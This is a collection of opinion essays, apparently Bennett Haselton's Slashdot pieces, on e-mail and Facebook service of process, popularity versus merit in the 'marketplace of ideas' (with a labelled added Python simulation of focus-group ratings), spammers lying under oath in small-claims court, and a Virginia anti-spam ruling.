Facebook is not, after all, secure or reliable, although these limitations are not the fault of Facebook itself. By "not reliable," I don't mean that it loses or mis-routes messages — I've never seen that happen — but that you have no idea whether someone has signed in to read a message, or deleted it by accident, or lost it among all the other messages that they received. As for whether it's "secure," like most services, the greatest weakness in Facebook's security is in the 'forgot your password' feature — if you compromise someone's e-mail account, then you can have a password reset link sent to their e-mail address and compromise their Facebook account as well. So your Facebook account is only as secure as your e-mail account, and e-mail accounts are usually vulnerable in their own "forgot your password" feature, which often lets you access someone's e-mail account just by knowing their birth date, their zip code, and the answer to an easy question like "Who is your favorite fictional character?" And in any case, obtaining "service" via Facebook doesn't preclude the possibility that the person you served on Facebook was an impostor, or another person who happened to have the same name.
What would really change the game would be if courts started ruling that service via Facebook was valid even without first attempting to serve a party via mail or other means. I had my own experience with a case like this in 2000, when programmers Matthew Skala and Eddy Jansson released a program called "CPHack" which could decode the encrypted list of sites blocked by a program called Cyber Patrol, so that people who owned copies of the program could use CPHack to decrypt the list of blocked sites. (One of the more controversial aspects of such blocking software is that the list of blocked sites is hidden from purchasers of the program.) A judge granted Cyber Patrol a ruling forbidding the authors from distributing the program, and ordering anyone hosting a mirror copy of the program to remove it as well. That same day, I received a copy of the ruling via e-mail from Cyber Patrol's lawyer, ordering us to remove the mirror from the Peacefire site. I asked a lawyer if that was considered valid service (this was back when I still thought that a legal question like that always had an objective answer, as opposed to the question of "valid service" being an entirely subjective one that depended on what judge you happened to get), and he said that I shouldn't take any chances and should take the mirror down anyway, which we did. Dozens of other mirror sites, which had sprung up in anticipation of the legal controversy, were also served with papers, although the overseas ones mostly ignored them.
So this was very different from a ruling made by the 9th Circuit Court of Appeals two years later, allowing a Las Vegas casino to serve an offshore company via e-mail because regular methods had failed. The court in that case wrote, "When faced with an international e-business scofflaw playing hide-and-seek with the federal court, e-mail may be the only means of effecting service of process." But I was a domestic scofflaw whose mailing address was publicly known (in the WHOIS registration for the Peacefire site). What was the rationale for allowing me to be served by e-mail?
Unfortunately I think it's probably just a case where the rules were vague enough that the judge felt entitled to bend them to achieve an outcome that he wanted. The 9th Circuit didn't leave much doubt as to the level of objectivity in their ruling on e-mail service either, in calling the defendant an "international e-business scofflaw."
And these are the two main reasons why I think that allowing electronic "insta-service" via e-mail or Facebook — in cases where parties have not first tried to serve papers via regular means — would erode the rights of the little guy. First, in most of the cases I can think of where a powerful plaintiff was playing "whack-a-mole" with multiple defendants by using electronic service of process to shut down new sites as fast as they were springing up, the goal they were trying to achieve was (a) futile, if half the mirror sites were overseas anyway, and (b) ultimately incompatible with civil liberties. (Why shouldn't people have the right to decrypt the list of sites blocked by Cyber Patrol? After the ACLU got involved on appeal, a higher court ultimately ruled that mirror sites could not be ordered to take down CPHack. The HD DVD encryption key controversy is another well-known example.) In cases where a plaintiff has a legitimate claim against multiple sites — for example, sites that are violating the plaintiff's copyright by hosting unauthorized copies of content that they own — most service providers already publish an e-mail address where copyright owners can send a DMCA takedown notice, and where the copyright owner is risking large statutory financial penalties if they send a takedown notice that turns out to be baseless. There are no similar protections to prevent abuses of the system through electronic service of other kinds of legal notices.
The other reason this trend could work against the average person, is that any vague rule that is not consistently followed by different judges, puts non-lawyers at a disadvantage in court. Partly because it may confuse non-lawyers who hear that e-mail service was allowed in one case, and think that's part of "the rules," and then find that e-mail service was disallowed in another case, and wonder how "the rules" could allow it in one case but not in another, all the while laboring under the mistaken impression that there actually are "rules" which unambiguously determine whether or not e-mail service is allowed, when the truth is that it's just up to each individual judge. But also because every ambiguity in the rules is another opportunity for the judge's prejudices to influence the outcome. I do not think that most judges are prejudiced against people based on race or gender, but I doubt you could find any legal professional who thinks that most judges would take a case equally seriously regardless of whether it was brought by a professional lawyer or by a layperson representing themselves. (At one point in my spammer-suing career, I had only about a 50-50 chance of my motions even being read.)
So, let's not get carried away applauding judges for being "hip" and "with it" for allowing service via e-mail or Facebook. And if they start allowing it more frequently, can we at least ask that they pick one rule and stick with it?
-
Censorship By Glut
Frequent Slashdot contributor Bennett Haselton writes "A 2006 paper by Matthew Salganik, Peter Dodds and Duncan Watts, about the patterns that users follow in choosing and recommending songs to each other on a music download site, may be the key to understanding the most effective form of "censorship" that still exists in mostly-free countries like the US. It also explains why your great ideas haven't made you famous, while lower-wattage bulbs always seem to find a platform to spout off their ideas (and you can keep your smart remarks to yourself)." Read on for the rest of Bennett's take on why the effects of peer ratings on a music download site go a long way towards explaining how good ideas can effectively be "censored" even in a country with no formal political censorship.
In a country where you're free to say almost anything in the political arena, I think the only real censorship of good ideas is what you could call "censorship by glut". If you had a brilliant, absolutely airtight argument that we should do something -- indict President Bush (or Barack Obama), or send foreign investment to Chechnya, or let kids vote -- but you weren't an established writer or well-known blogger, how much of a chance do you think your argument would have against the glut of Web rants and other pieces of writing out there? Especially if your argument required people to read it and think about it for at least an hour? Perhaps your situation could be compared to that of a brilliantly talented band submitting a song for Matthew Salganik's experiment.
What Salganik and his co-authors did was recruit users through advertisements on Bolt.com (skewing toward a teen demographic) to sign up for a free music download site. Users would be able to listen to full-length songs and then decide whether or not to download the song for free. Some users were randomly divided into eight artificial "worlds" in which, while a user was listening to a song, they could see the number of times that the song had been downloaded by other users in the same world -- but only by other users within their own world, not counting the downloads by users in other worlds. The test was to see whether certain songs could become popular in some worlds while languishing in others, despite the fact that all groups consisted of randomly assigned populations that all had equal access to the same songs. The experiment also attempted to measure the "merit" of individual songs by assigning some users to an "independent" group, where they could listen to songs and choose whether to download them, but without seeing the number of times the song had been downloaded by anyone else; the merit of the song was defined as the number of times that users in the independent group decided to download the song after listening to it. Experimenters looked at whether the merit of the song had any effect on the popularity levels it achieved in the eight other "worlds".
The authors summed it up: "In general, the 'best' songs never do very badly, and the 'worst' songs never do extremely well, but almost any other result is possible." They also noted that in the "social influence" worlds where users could see each others' downloads, increasing download numbers had a snowball effect that widened the difference between the successful songs and the unsuccessful: "We found that all eight social influence worlds exhibit greater inequality -- meaning popular songs are more popular and unpopular songs are less popular -- than the world in which individuals make decisions independently." Figures 3(A) and 3(C) in the paper show that the relationship between a song's merit and its success in any given world -- while not completely random -- is tenuous. And if you're a talented musician and you want to get really depressed about your prospects of hitting the big time, Figures 3(B) and 3(D) show the relationship between a song's measured merit and its actual number of sales in the real world. (Although those graphs may cheer you up if you're a struggling musician who hasn't made it big yet -- maybe it's not you, it's just the roll of the dice.)
As Richard Thaler and Cass Sunstein put it in their all-around fascinating book Nudge, where I first read about the Salganik study:
"In many domains people are tempted to think, after the fact, that an outcome was entirely predictable, and that the success of a musician, an actor, an author, or a politician was inevitable in light of his or her skills and characteristics. Beware of that temptation. Small interventions and even coincidences, at a key stage, can produce large variations in the outcome. Today's hot singer is probably indistinguishable from dozens and even hundreds of equally talented performers whose names you've never heard. We can go further. Most of today's governors are hard to distinguish from dozens or even hundreds of politicians whose candidacies badly fizzled."
Is the blogosphere, or the "marketplace of ideas" in general, any different? If a random sample of bloggers were rated based on some independent measure of merit -- for example, independent ratings from a random sampling of blog readers, who were looking at the bloggers' writing samples for the first time, analogous to users in Salganik's "independent" world -- and those ratings were then correlated with the bloggers' traffic or some other measure of success, it's not hard to imagine the results would be similar to those of the 8-worlds experiment: the best often rise to the top, the very worst rarely do, but success in the vast middle would be close to random. In fact, while music listeners would have no logical reason to like a song just because others did, users in the blogosphere and other public forums would have several rational reasons to cluster around writers who are already popular: (1) errors are more likely to have been spotted and pointed out by someone else; (2) as an extension of that, others are more likely to have provided comments and other value-added content; (3) if you are the first person to spot an error, it's more important on a popular blog to point out the error and stop the misinformation from spreading, than on a minor blog that nobody has ever heard of. So the "snowball effect" of popularity in the blogosphere would be even more pronounced.
Then why do so many people believe in what Thaler and Sunstein call the "inevitability" of success based on merit, in domains like music, politics, and writing? I think it's because the belief is what scientists call an unfalsifiable one -- if the "best" acts are assumed to be the ones that end up on the top of the pile, then the marketplace has always sorted the "best" content to the top, by definition. Since the definition is circular, the premise could never be disproved by any amount of counter-evidence -- even if an act that used to be popular, suddenly falls under the radar, that could be seen as "proof" that they lost whatever magic touch they used to have, not as evidence of the arbitrariness of the market! The only disproof would be an artificial experiment like Salganik's, showing that once you get beyond a certain threshold of quality, commercial success has little relationship to independently measured merit -- but such experiments, which in Salganik's case required the cooperation of over 14,000 users, don't come along very often. And as long as most people don't realize how arbitrary the existing marketplaces are, there isn't enough demand to justify building a system that could work better -- indeed, to even justify asking the question of whether a system could be designed that would work better.
And that, I think, is how "censorship by glut" really works. It's not just the sheer amount of written content that censors small voices -- if you happen to know about a particular writer that you consider a fount of wisdom, then the existence of a billion other Web pages won't stop you from reading that writer's content. And it's not as if there aren't plenty of people who realize that success can be highly arbitrary. The problem is that as long as most people assume that the existing marketplace of ideas does a good job of sorting the best content to the top, then they'll be more inclined to stay with the most popular news sites and blogs, and even the minority who know that it's largely a lottery, will have no effective way of finding the best content among everything else, so they'll end up sticking with the most popular sites as well. Worse, as a secondary effect, most people with something useful to contribute won't even bother, if they don't already have a large built-in audience. I know plenty of people who could write insightful essays about social and technological issues, essays that would give most readers a new perspective such that they would definitely say afterwards: "That was worth my time to read it." But it wouldn't be worth it to the writers, because they know that their content isn't going to get magically sorted into its deserved place in the hierarchy.
(My own favorite blog that nobody's ever heard of is Seth Finkelstein's InfoThought, which is usually logical and insightful and is only about 25% of the time about how "nobody ever reads this blog, so what's the point". His Guardian columns are also good and usually don't have that subtext, perhaps because it's considered impolite to use a newspaper's column-inches (column-centimeters?) to complain that you have no voice.)
So can this problem be avoided, or is inequality and arbitrariness just a permanent part of the marketplace for content and ideas? You could create an artificial world that would sort user-submitted content according to some other algorithm -- and even if it didn't give good writers the fame that they theoretically deserved in the larger world, it might still provide them with enough of an audience within the artificial universe, to make it worth their time to keep writing. One option would be to use Salganik's "independence" world model, where users would read content without being able to see the ratings that other people had given to it, or without even seeing recommendations from similarly-minded friends within the system. The trouble is that without any information about what other readers liked, without any starting point to sort good content from bad content, it may not be worth the reader's time to read through all the dreck to find the occasional buried treasure. I believe about as strongly as a person can believe, that the existing marketplace for content is far from meritocratic, for example that there are probably thousands of songs on iTunes that I've never heard of but would nonetheless love -- but even I don't spend time listening to the 30-second clips of random songs on iTunes, because it takes too long to find the stuff I would like.
But I submit there is a solution -- a variant of an argument that I've suggested for stopping cheating on Digg, or building Wikia search into a meritocratic search engine, or helping the best writers rise to the top on Google Knol. The solution is sorting based on ratings from a random sample of users. The remainder of this speculation will be very theoretical, and will at times seem like a Rube-Goldberg approach to what should be a simple problem. But at each juncture, the complications to the algorithm are motivated by an argument that anything simpler would not work. At many points along the way, it will be tempting to throw up one's hands and say, "Why go to all this trouble, the existing system works well enough." But this statement is hard to quantify with any actual evidence -- unless you're just using the circular definition above, that whatever rises to the top is automatically the "best".
For music listeners, the gist of the algorithm is: When an artist submits a new song in the alt-rock category for example, the song is distributed to a random sample of 20 users who have indicated an interest in that genre. If the average rating from those users is high enough, the song gets recommended to all of the site's users who are interested in alt-rock. If the average rating is not high enough, then the artist receives a notification, perhaps with a list of comments from the listeners suggesting what to improve. As long as the initial random sample of users is large enough that the average rating is indicative of what the rest of the site's alt-rock fans would think, the good content will get to be enjoyed by all of the site's alt-rock customers, while the bad content would fizzle after only wasting the time of 20 people. If it turns out that a random selection of 20 users are typically too lazy to rate the songs that are submitted to them, you could even make artists submit $10 to have their songs rated by the focus group, and pay each of the 20 raters $0.50 each for their trouble. Artists can't withhold payment as revenge for a bad rating, so the average ratings should still be proportional to the song's actual quality.
At this point, you might object that this system suffers from the same unfalsifiable, circular reasoning as the belief that the marketplace rewards the "best" content, if the best content is the content that wins in the marketplace. If I define the "best" content to be the content that gets the highest average score in a random focus group, then of course this algorithm sorts the best content to the top, because that's how "best" was defined! But this system does actually have a non-trivial property: If you implement the system in multiple separate "worlds" (similar to those that Salganik created), then provided your focus groups are large enough to provide representative random samples, the same content should rise to the top in each of the worlds, unlike the results in Salganik's experiment.
This actually wouldn't be the case if the initial focus groups were not big enough -- then random variations in a few voters' opinions could cause many songs to succeed in one world and fail in another. So it's a non-trivial property that is not automatically true, and would not be true if you made an error in designing the system, like making the focus groups too small. But the larger the size of the random sample, the smaller the variance in the expected value of the average of their ratings, and the greater agreement you would expect between the results from different worlds.
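The effect of focus-group size on agreement between worlds, as an added simulation that is not part of the original essay. It assumes like/dislike votes, a 50% promotion threshold, and a constructed catalogue whose songs' true appeal is spread evenly between 0.2 and 0.8; all function and parameter names are hypothetical.

```python
import random


def run_world(qualities, group_size, threshold, rng):
    """One independent 'world': every song gets its own random focus group."""
    promoted = []
    for q in qualities:
        # Assumption: each sampled listener likes the song with probability q.
        likes = sum(1 for _ in range(group_size) if rng.random() < q)
        promoted.append(likes / group_size >= threshold)
    return promoted


def cross_world_agreement(group_size, worlds=8, songs=200, threshold=0.5, seed=1):
    """Fraction of songs that get the same verdict in every world."""
    rng = random.Random(seed)
    # Constructed catalogue: true appeal spread evenly from 0.2 to 0.8.
    qualities = [0.2 + 0.6 * i / (songs - 1) for i in range(songs)]
    outcomes = [run_world(qualities, group_size, threshold, rng)
                for _ in range(worlds)]
    # zip(*outcomes) regroups the verdicts per song across all worlds.
    unanimous = sum(1 for verdicts in zip(*outcomes) if len(set(verdicts)) == 1)
    return unanimous / songs


if __name__ == "__main__":
    for n in (5, 20, 500):
        print(f"focus group of {n:>3}: "
              f"{cross_world_agreement(n):.0%} of songs get the same verdict in all worlds")
```

Songs whose true appeal sits close to the threshold remain a coin flip at any practical group size, so agreement approaches but does not reach 100%.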
As Salganik pointed out to me, this system does under-reward songs that might require repeated listenings over time to gain an appreciation of their qualities. But even this, strictly speaking, can be modeled in exchange for cash -- I'll pay 20 users $2 each if they listen to my song once today, once in three days, and once again a week after that (the site could stream the song to them to provide at least some likelihood that the users weren't cheating). This assumes some things, such as that repeated exposure has the same growing-on-you effect even if the exposure is forced -- but in the real world, songs often grow on you from repeated listenings that are "forced" anyway, if they're played in the doctor's office or on the radio when you don't bother to change the channel. And this might be more complicated than necessary -- often when a song grows on you, it at least interests you enough the first time you hear it, that you'd give it a positive rating on the first listen, which is all that the site requires for the song's success.
However, if you try to adapt this trick to a meritocracy for written content, you run into different problems. With a song, if you poll a random sample of users, the odds are very small that anyone being polled will have a vested interest in the success of the song, like one of the band members or one of the song's producers (assuming the population of users is large enough, and the song's producers have not been able to create a huge number of "sockpuppet" accounts to manipulate the voting). So you can assume the ratings will be free of any prior bias. But with a political post, for example, if you write a pro-Bush or anti-Bush essay, it's quite likely that among a random sample of users, there will be people who are biased to vote up (or vote down) any post that has anything good to say about the President. The essays voted to the top may not be the best-written ones, but simply the ones that pander to the most popularly held opinions.
But if the "best" essays are not the ones that receive the highest percentage of positive votes, even when polling a random sample of independent users -- which I was advocating as the gold standard for measuring merit -- then how do you define what makes the "best" essays, anyway? There are many possible answers, but I suggest: A necessary condition for being among the "best" essays would be to convince the most people of something that they didn't believe before, without resorting to tricks such as blatantly fabricating statistics or attributing made-up quotes. This is not a sufficient condition for merit -- maybe the point of view that you're convincing people of, is still wrong -- but I submit that if you're not at least changing some people's minds, then there's no point. An essay that changes a lot of people's minds in a random focus group, is usually worth reading, if only to see why it has that effect.
Unfortunately, this doesn't suggest a better way to poll users about the merit of an essay, because if you ask users, "Were you a Bush supporter before reading this essay?" and "Were you a Bush supporter afterwards?", Bush supporters are eventually going to figure out that the way to give the essay a high score on the mind-changing scale, would be to (falsely) say that they were not a Bush supporter before reading the essay, but they were one afterwards. So you'd still end up rewarding the essays that reinforce pre-existing opinions instead of the ones that change people's minds.
From here the counter-measures and counter-counter-measures get increasingly complicated. For each category of essays that a user wants to rate, such as Bush opinion pieces, you could require new users to enter their current opinion: either pro-Bush or anti-Bush. Then if they were asked to rate a pro-Bush essay, they would only be able to vote that the essay "changed their minds" by switching their registered opinion from "anti-Bush" to "pro-Bush". But Bush supporters could sign up initially as anti-Bush, just in the hopes of being part of a random focus group so they could cast their mind-changing vote for a Bush essay by changing their registration to "pro-Bush"! However, each user would only be able to do that once -- or do you allow users, after they've switched from anti-Bush to pro-Bush, to "reload" by spontaneously switching back to anti-Bush for no reason at all, so they're all set to cast a mind-changing vote for the next pro-Bush essay? Or would they only be allowed to switch back to anti-Bush, by casting a mind-changing vote as part of a random focus group for an anti-Bush essay -- thus giving a boost to an anti-Bush screed, as part of the price they pay for the next vote they cast for a pro-Bush piece? Then users could still game the system, by switching to "anti-Bush" when casting a vote for a very poorly written anti-Bush essay that they don't think anybody else will vote for anyway, and then switching back to "pro-Bush" only for the good essays that have a shot, hoping that their votes will coalesce around the decently-written pro-Bush essays and push them to the front page...
Am I over-thinking this? I submit this is an area where there's been too much under-thinking. Haven't we all been tempted to believe that the marketplace of ideas -- not to mention bands, blog posts, and business ventures -- efficiently sorts content to the place in the hierarchy of rewards that it deserves, without having any real evidence for this, except the circular definition of "quality" as being proportional to success? And the more people believe this, the more that marginalized voices will effectively be censored, even when they have something brilliant to contribute. We should at least think about ways that we could do better. Or else, prove logically that it can't be done (a logical proof can only approximate the real world, but it could show that such a pure meritocracy would be very improbable, or wouldn't work well). However I think the ideas above make it seem unlikely that a meritocracy is logically impossible. Maybe they're a step in the right direction. Maybe someone else's ideas would be better. The important thing is that a meritocratic algorithm be judged by something other than a circular definition, which simply decrees by fiat that the winning content is the best.
-
Spammer Perjury is Worth Prosecuting
Slashdot regular Bennett Haselton summarizes his essay by saying "Spammers really do lie more often under oath than other parties in court (surprise). Judges and prosecutors could promote respect for the law by cracking down on it, and maybe make a dent in spam in the process." Read on to learn of his experiences with (shocking!) spammers who lie in court.
I'm sure everyone feels like their opponents in court are the most reprehensible liars that ever walked the face of the Earth. But these instances seem unusually clear-cut even for a courtroom:
-
When I sued one Ohio company for sending me spam, they sent a letter to me (and, when that didn't work, to the court) claiming that someone had dropped a business card in their box at a trade show with an e-mail address one letter different from mine, and they must have mis-read the address when typing it in. They didn't know that after I first got their spam, I called them pretending to be an interested customer, and tape-recorded a conversation with their advertising manager, pretending to be impressed and asking him how he did it (I was in Arizona, so it was legal to tape the call). He admitted that he used a program to scrape e-mail addresses from Web pages into a list and spam them from his desktop.
-
A spammer who lived in Washington appeared in court and claimed that he had never sent the spam in question and wouldn't know how. I then produced a tape recording of another conversation in which I had talked to him on the phone, again pretending to be an interested customer, and he talked about sending the mails from a server in China to make it harder for people in the U.S. to block them.
-
One company called "Lions Pride Enterprises" actually sent a representative from out of state to tell the judge, "I can tell you, under penalty of perjury, that we looked up the address bhas (at) speakeasy.net in our records, and verified that he had signed up for our list via confirmed-opt-in" (this was right after he explained to the judge, more or less accurately, what confirmed-opt-in meant). Except the mail hadn't been sent to bhas (at) speakeasy.net, the headers showed it was sent to bennett (at) peacefire.org and then forwarded to bhas (at) speakeasy.net. Presumably the spammer just looked at the first address they could find in the headers and assumed that's the one they had mailed, and claimed that address had "opted in." (Much later, this same company apparently branched out into infecting people with spyware.)
-
A spammer from Michigan called in to the court hearing by phone, to defend against charges that he'd sent me a spam advertising credit card processing services, and claimed, "I don't even sell merchant accounts." (He lost, due to inconsistencies in his story -- the judge in that case was unusually tech-savvy.) A few weeks later, the same guy sent me another merchant account spam, so I sued him again, and this time he called in to the court hearing (with a different judge) and admitted that he'd sent the spam, but claimed it was legal. I tried to challenge his credibility on the grounds that he'd testified under oath earlier that he "didn't even sell merchant accounts," but the judge said I wasn't allowed to bring that up.
Meanwhile, I've sat through dozens of other people's Small Claims cases, and I've never seen anyone in a non-spammer case get caught really, brazenly lying under oath. Of course, it always seems more egregious when it's your opponent -- but I probably would have noticed if someone had gotten tripped up by a physical document or a recording of their own voice.
The traditional cost-benefit analysis of prosecuting people who lie under oath in a civil trial is that it's just not worth it. The King County Prosecutor's office responded to my inquiry to say they could not recall any instances of someone prosecuted for perjury committed in a civil case. It is not true, by the way, that civil perjury is never prosecuted — when this assumption was making the rounds in 1998 during the Clinton perjury controversy, Professor Stephen Gillers of NYU published a list of counterexamples -- but he conceded in an e-mail that it's nevertheless highly unlikely. Perhaps this makes sense for most trials, where parties come from a general population that includes some honest people and some dishonest people, and even dishonest people often just bend the truth to a degree that outright lying would be hard to prove. (Although I still think it's possible that the costs of prosecuting people who lie under oath in civil cases, might still be outweighed by the benefits of having everyone be scared into being a little more truthful in court proceedings.)
But spammers are different. In the U.S., all spammers are liars — either they are lying to their hosting provider about what they're doing, or, if they have a secret agreement with their provider to avoid getting kicked off, they are complicit in their provider lying to the rest of the world by claiming that they don't allow spam to emanate from their network. (I'm assuming that 100% of U.S. providers at least claim not to allow the sending of spam. This may not be true of the entire world.) Those lies in themselves can't always be punished in court — I can't sue a spammer for lying to their service provider — but I think that courts just haven't realized that all spammers are liars to some degree, and they're more likely than average to lie under oath. This may make the cost-benefit analysis different in the case of prosecuting spammers who get caught lying. You wouldn't need a "spammer perjury law"; there are already laws against perjury, if judges wanted to enforce them.
Courts could start with deterrents that don't cost anything. All judges start out their Small Claims hearings by laying out the rules. Some of them include some very stern admonitions about parties not interrupting each other or the judge (one judge, who possibly had a bad morning, started the afternoon session by threatening to have anyone thrown in jail who argued with him). But I've never seen a judge say anything about being strictly required to tell the truth under oath, with penalties for lying that theoretically include jail time. And if someone does get caught lying, the judge could reprimand them as strongly as possible and stop just short of recommending a criminal prosecution. "Oh, wow," you're laughing, "a stern reprimand! That'll teach them!" But that's what judges do to people who interrupt the judge or each other, and it does get people's attention.
In the examples above, what was surprising was not that the spammers lied to the court but that the judges seemed so blasé about it. In the first case, I had gotten spammed by an Ohio company called SAY Security. After I filed the Small Claims suit and served the papers on them in the mail along with a copy of the spam, I got an e-mail from the owner, Jason Szuch, claiming that they had received a business card at a trade show with 'bnas (at) speakeasy.net' handwritten on it, and accidentally replaced the 'n' with an 'h', and that's how I had gotten their mail. They later made the same claim in a letter to the judge. At the trial, SAY Security didn't show up, so I first pointed out that the e-mail had been sent to bennett (at) peacefire.org and automatically forwarded to bhas (at) speakeasy.net, so it was another case of the spammer mis-reading what address it was sent to, and coming up with a story after the fact. I also had a recording of a conversation with SAY Security's advertising manager, in which he explained how he used a program called Email Extractor to scrape e-mails from Web pages and send the ads.
At that point, the judge thought he had me: You're not allowed to record phone calls in Washington without the consent of all parties. I told him that I knew this, which is why I had made the call and recorded it while I was visiting my Mom in Arizona, which has no such law (and neither does Ohio, which was where the other party was — in order to secretly tape a phone call, it has to be legal in both the caller's state and the call recipient's state). The judge still said I couldn't use it as evidence in Washington. This raises an interesting question. My understanding is that the rules of evidence in Washington don't say "You can't use a secretly taped phone call as evidence." They say, on the one hand, "You can't secretly tape a phone call in Washington," and on the other hand, "You cannot use evidence that was obtained illegally" — but if the call was taped in Arizona and then brought to Washington, it wasn't obtained illegally. I compared it to winning money by gambling in Vegas and then bringing it to Washington to pay the Small claims filing fee — what difference does it make that gambling is illegal in Washington? Oh well, different judges probably would have come to different conclusions on that.
But the real point is that even if the judge did think the recording was inadmissible, couldn't he have still said something like, "Well, if the court did admit this evidence, and if these defendants were here, then they could very well be arrested for perjury — if they were here, I'd tell them that they just had a really close call." At least for the benefit of everyone else who was in the courtroom, waiting for their case to be heard — send a message that the court does care if you get caught lying. As it was, he just shrugged it off, and I got a default judgment since SAY Security didn't show up.
The second case was against a spammer named Joe Spies, who did live in Washington, and who came to court claiming that he didn't know how to send spam and had never made anyone an offer to send spam for money. Again, I had a recording of a phone call in which I pretended to be an interested customer, and he said he could send "5 million e-mails for $500" from a server in China. (This time, since both parties were in Washington, I used a phone number I had specially set up so that people who called it would hear a disclaimer saying "Your call may be monitored or recorded," before it forwarded to my home phone.) Judge Karlie Jorgensen said that even with that phone call, there was not enough evidence that the defendant had sent the e-mail. (This was also the case that I wrote about when I filed a motion with the middle two pages stuck together in the center, and after the motion was denied, I went to the courthouse and saw that the pages were still attached, so I knew that she hadn't read it.)
Lions Pride Enterprises was the other company who sent a representative claiming that they had sent the mail to bhas (at) speakeasy.net and saying, "I swear under penalty of perjury [he was already sworn in, but repeated it presumably for dramatic effect] that I checked personally, and the address bhas (at) speakeasy.net subscribed to our list via verified opt-in," even though the mail had actually been sent to bennett (at) peacefire.org. This was my first spam case, so at the hearing I stuck to my script and I didn't think to point this out to the judge. But if the courts took a harsher view of defendants lying under oath, maybe it would have been worth the time to write a letter to the judge later after I realized the defendant had lied. (In theory, you can be prosecuted for lying under oath even if it's not discovered until after the original trial is over -- since "in theory" is the only place where spammers are punished for lying under oath anyway.)
Finally, in May 2008, a spammer in Michigan named John Tucker called in to a court hearing in which I'd sued him for sending me more spam advertising merchant accounts, as well as the company, Pivotal Payments, on whose behalf he was sending the spam. Tucker admitted that he had sent the spam but claimed that Pivotal Payments had nothing to do with it, at which point I attempted to discredit him by bringing up what he'd said at the last trial:
Me: I wanted to address something that Mr. Tucker said. He sent the faxes saying that he sent this e-mail but he doesn't think it's a violation. But he has stated under oath, to the court, at one point: "I don't even sell merchant accounts." Now I want to introduce that statement because there's a specific rule in the Rules of Evidence, ER 801, which says--
Judge Eiler: Well, don't quote the Rules of Evidence at me. The Rules of Evidence do not necessarily apply in Small Claims Court. If I were to apply the Rules of Evidence, we would have hearings that lasted about 25 seconds. So, don't quote to the rules of Evidence. If you think there's something that you want to tell me, tell it to me straight out.
Me: All right. I want to challenge the credibility of John Tucker as a witness, because he has in the past said under oath in court, "I don't even sell merchant accounts."
Judge Eiler: Did he do it in this court?
Me: Yes.
Judge Eiler: Did he do it today?
Me: No. It was under oath.
Judge Eiler: Well, while you may tell me it's under oath, it wasn't in front of me, I'm not going to hear it. Move on.
Me: Well--
Judge Eiler: Move on.
Me: Do you want the audio?
Judge Eiler: Do you want to move on?
Now there's an odd statement -- "If I were to apply the Rules of Evidence, we would have hearings that lasted about 25 seconds." In Small Claims, the Rules of Evidence are sometimes relaxed in the other direction -- evidence that would be excluded from a regular trial is sometimes allowed to be presented -- but what's the point of making Small Claims more restrictive, excluding evidence that is explicitly allowed under the rules?
Largely on the basis of John Tucker's testimony absolving Pivotal Payments, and their claims that they refused to pay him once they found out he was spamming, I didn't get a judgment against them (I did get another judgment against John Tucker, although I doubt that he has any assets). Later John told me on the phone that Pivotal Payments did pay him the money they owed him after the trial, in accordance with their agreement with him that he would get paid once they were dismissed from the lawsuit. If that's the case, then they lied under oath, too.
This was the same Judge Eiler who, in an earlier case, said that an e-mail "didn't quite have the earmarks" of "spam" sent in bulk, when the e-mail said "I run the web site Work At Home Business Opportunities [...] Please post a link to my site as follows...". The Commission on Judicial Conduct formally reprimanded her in 2005 for being rude to plaintiffs representing themselves; she is currently facing charges for the second time for the same issues, including "preventing pro se litigants [i.e. people representing themselves] from fully presenting their testimony or their positions in court." The CJC receives hundreds of complaints every year about rude and inappropriate behavior by judges, and rejects 97% of the complaints. For a judge to get on their radar even once is an achievement; to do it twice probably warrants a steroids test.
But with regard to laxity towards spammers lying under oath, she is indeed no worse than any other judge. Although Professor Gillers's article showed it's not true that no one is ever prosecuted for civil perjury, it's no wonder that people think that's the case, based on the rarity of prosecutions, combined with the outcomes of the two famous cases that people have heard about. Bill Clinton was disbarred from practicing law before the Supreme Court and had his Arkansas law license suspended for five years, but was never prosecuted; Kwame Kilpatrick was heavily criticized for lying under oath, but only went to jail for violating the terms of his bond. The defenders of both men had a point that even if they lied under oath in a civil case, hardly anyone else ever got punished for that.
In fact, I don't think all perjurers should be prosecuted — Clinton and Kilpatrick were lying to cover up extra-marital affairs, after all. When Clinton was asked during Paula Jones's sexual-harassment lawsuit whether he had ever had a sexual relationship with any other subordinate, if he had answered "Yes" out of the blue and voluntarily spilled out all the lurid details about Monica Lewinsky, wouldn't you have thought, "Dude, you could have just said, 'No'"? They probably shouldn't have gone to jail for perjury. But the mud-slinging they endured, as partisan as it was, at least reminded everyone that a rule had been broken.
The judicial branch can instruct judges at all levels to take perjury in civil cases seriously — at the very least, judges should act angry when someone gets caught lying under oath, at least as angrily as they act when someone interrupts them. That promotes respect for the rule of law, and it doesn't cost anything. And if some parasite like a spammer gets caught lying, prosecutors may be doing the world a favor by pressing criminal charges against them.
In other words, I agree with Thomas Sowell, who responded to defenders of Bill Clinton who said that "everybody" lies about sex: "Everybody urinates every day, but if you do it in a court of law, you will be arrested. And then you will be tried by a jury of your PEERS." OK, I made the last part up.
-
Virginia High Court Wrong About IP Addresses
Frequent Slashdot contributor Bennett Haselton writes "The Virginia Supreme Court has ruled that the state's anti-spam law, which prohibits the sending of bulk e-mail using falsified or forged headers, violates the First Amendment because it also applies to non-commercial political or religious speech. I agree that an anti-spam law should not outlaw anonymous non-commercial speech. But the decision contains statements about IP addresses, domain names, and anonymity that are rather basically wrong, and which may enable the state to win on appeal. The two basic errors are: concluding that anonymous speech on the Internet requires forged headers or other falsified information (and therefore that a ban on forged headers is an unconstitutional ban on anonymous speech), and assuming that use of forged headers actually does conceal the IP address that the message was sent from, which it does not." Click that magical little link below to read the rest of his story.
The first 20 pages of the decision, which are all about legal standing, jurisdiction, and overbreadth, made my eyes glaze over. I'm not analyzing those at all except to point out that on most of those issues, the lower court came to exactly the opposite conclusion from that of the Virginia Supreme Court, and there is no reason to think that the higher court is any more likely to be "correct" than the lower court (even granting the assumption that there is an objectively "correct" answer to these questions). Any time you feel intimidated by "experts," it's helpful to step back and ask whether the alleged experts even agree with each other.
Page 21 is where the technical stuff starts that we can tear apart directly. The decision says, in talking about the transmission of e-mail:
The IP address and domain name do not directly identify the sender, but if the IP address or domain name is acquired from a registering organization, a database search of the address or domain name can eventually lead to the contact information on file with the registration organizations. A sender's IP address or domain name which is not registered will not prevent the transmission of the e-mail; however, the identity of the sender may not be discoverable through a database search and use of registration contact information.
